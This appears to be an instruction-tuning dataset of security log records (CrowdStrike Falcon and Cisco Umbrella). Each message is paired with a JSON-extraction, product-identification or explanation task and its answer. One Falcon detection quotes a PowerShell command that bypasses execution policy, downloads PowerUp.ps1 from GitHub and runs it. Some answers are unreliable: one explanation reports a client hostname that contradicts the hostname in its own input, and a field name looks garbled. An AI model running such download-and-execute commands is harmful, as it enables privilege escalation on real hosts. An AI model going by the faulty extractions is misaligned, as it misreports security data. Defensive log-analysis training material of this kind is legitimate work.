"message": "WitFoo-Artifact ::: message={\"device_id\":\"dfbb62cf44104a3d85ad81cfd5bebb3c\",\"timestamp\":\"2023-08-29T16:44:43Z\",\"template_instance_id\":\"4712\",\"behavior_id\":\"10166\",\"filename\":\"powershell.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" \",\"scenario\":\"attacker_methodology\",\"objective\":\"Follow Through\",\"tactic\":\"Execution\",\"tactic_id\":\"TA0002\",\"technique\":\"PowerShell\",\"technique_id\":\"T1059.001\",\"display_name\":\"PShellDownloadRun\",\"description\":\"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.\",\"severity\":70,\"confidence\":80,\"ioc_type\":\"command_line\",\"ioc_value\":\"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks\",\"ioc_source\":\"interactive_script\",\"ioc_description\":\"\",\"user_name\":\"fish\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-94611\",\"control_graph_id\":\"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728\",\"triggering_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254\",\"sha256\":\"N/A\",\"md5\":\"N/A\",\"parent_details\":{\"parent_sha256\":\"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c\",\"parent_md5\":\"c6cd12bf63e9b9b4478e6f975e7c293d\",\"parent_cmdline\":\"C:\\\\Windows\\\\Explorer.EXE\",\"parent_process_graph_id\":\"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mstarkine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-08-29T16:44:43Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "132.101.113.134",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"fish","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"dfbb62cf44104a3d85ad81cfd5bebb3c","timestamp":"2023-08-29T16:44:43Z","template_instance_id":"4712","behavior_id":"10166","filename":"powershell.exe","filepath":"\\Device\\HarddiskVolume1\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","alleged_filetype":"exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","scenario":"attacker_methodology","objective":"Follow Through","tactic":"Execution","tactic_id":"TA0002","technique":"PowerShell","technique_id":"T1059.001","display_name":"PShellDownloadRun","description":"A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.","severity":70,"confidence":80,"ioc_type":"command_line","ioc_value":"powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks","ioc_source":"interactive_script","ioc_description":"","user_name":"fish","user_id":"S-1-5-21-1959957726-1537299114-1298153393-94611","control_graph_id":"ctg:dfbb62cf44104a3d85ad81cfd5bebb3c:674310045728","triggering_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674754830254","sha256":"N/A","md5":"N/A","parent_details":{"parent_sha256":"e1ea06c6884a2ceb9dd0efeb788011ab2b17041f1c7438a9555415501e9e374c","parent_md5":"c6cd12bf63e9b9b4478e6f975e7c293d","parent_cmdline":"C:\\Windows\\Explorer.EXE","parent_process_graph_id":"pid:dfbb62cf44104a3d85ad81cfd5bebb3c:674712003826"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=132.101.113.134 ::: fileHash=N/A ::: fileName=powershell.exe ::: filePath=\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ::: userName=fish ::: clientMAC=0edeb6ae9241 ::: created_at=2023-08-29T16:44:43Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-29T16:44:43Z ::: clientHostname=NVIINFRDEVAPP02.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVIINFRDEVAPP02.devnvi.paygoint.com
clientmac: 0edeb6ae9241
filehash: N/A
filename: powershell.exe
filepath: \Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-08-29T16:44:43Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 132.101.113.134
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"213.172.189.67","externalIp":"36.91.239.212","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"213.172.189.67\",\"externalIp\":\"36.91.239.212\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-17T14:43:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "213.172.189.67",
"serverIP": "36.91.239.212",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"213.172.189.67","externalIp":"36.91.239.212","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"213.172.189.67","externalIp":"36.91.239.212","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=213.172.189.67 ::: serverIP=36.91.239.212 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-17T14:43:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 213.172.189.67
serverIP: 36.91.239.212
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"194.59.48.4","externalIp":"252.15.6.158","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"194.59.48.4\",\"externalIp\":\"252.15.6.158\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-17T14:43:12.000Z\"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-17T14:43:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "194.59.48.4",
"serverIP": "252.15.6.158",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"194.59.48.4","externalIp":"252.15.6.158","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"194.59.48.4","externalIp":"252.15.6.158","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-17T14:43:12.000Z"} ::: clientIP=194.59.48.4 ::: serverIP=252.15.6.158 ::: userName=fish ::: created_at=2023-05-17T14:43:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-17T14:43:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-17T14:43:12.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 194.59.48.4
serverIP: 252.15.6.158
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"3.240.199.65","externalIp":"179.82.63.47","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"3.240.199.65\",\"externalIp\":\"179.82.63.47\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T16:28:22.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "3.240.199.65",
"serverIP": "179.82.63.47",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"3.240.199.65","externalIp":"179.82.63.47","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"3.240.199.65","externalIp":"179.82.63.47","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=3.240.199.65 ::: serverIP=179.82.63.47 ::: userName=fish ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T16:28:22.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 3.240.199.65
serverIP: 179.82.63.47
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"199.80.246.3","externalIp":"53.35.236.248","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"199.80.246.3\",\"externalIp\":\"53.35.236.248\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T16:28:22.000Z\"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T16:28:22.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "199.80.246.3",
"serverIP": "53.35.236.248",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"199.80.246.3","externalIp":"53.35.236.248","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | Product: Umbrella
Vendor: Cisco | Identify this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"199.80.246.3","externalIp":"53.35.236.248","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-05-18T16:28:22.000Z"} ::: clientIP=199.80.246.3 ::: serverIP=53.35.236.248 ::: userName=janedoe ::: created_at=2023-05-18T16:28:22.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T16:28:22.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message:
action: block
fqdn: pushclk-10416.com
messagetype: firewall_action
productids: [38]
senderhost: kafka.precinct
sensitivity: normal
serverhostname: pushclk-10416.com
severitycode: 2
severitylabel: critical
sourceinfo: unknown
starttimeutc: 2023-05-18T16:28:22.000Z
tags: ['OpenDNS Detection', 'firewall_action']
vendorcode: AdvertisementsMalwarePhishing
streamName: OpenDNS Detection
clientIP: 199.80.246.3
serverIP: 53.35.236.248
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"149.22.203.83","externalIp":"183.79.58.28","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch | {
"action": "block",
"fqdn": "pushclk-10416.com",
"message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"149.22.203.83\",\"externalIp\":\"183.79.58.28\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=149.22.203.83 ::: serverIP=183.79.58.28 ::: userName=fish ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch",
"messagetype": "firewall_action",
"productids": [
38
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"serverhostname": "pushclk-10416.com",
"severitycode": 2,
"severitylabel": "critical",
"sourceinfo": "unknown",
"starttimeutc": "2023-05-18T20:29:12.000Z",
"tags": [
"OpenDNS Detection",
"firewall_action"
],
"vendorcode": "AdvertisementsMalwarePhishing",
"streamName": "OpenDNS Detection",
"clientIP": "149.22.203.83",
"serverIP": "183.79.58.28",
"userName": "fish"
} | Create a JSON artifact from the message |
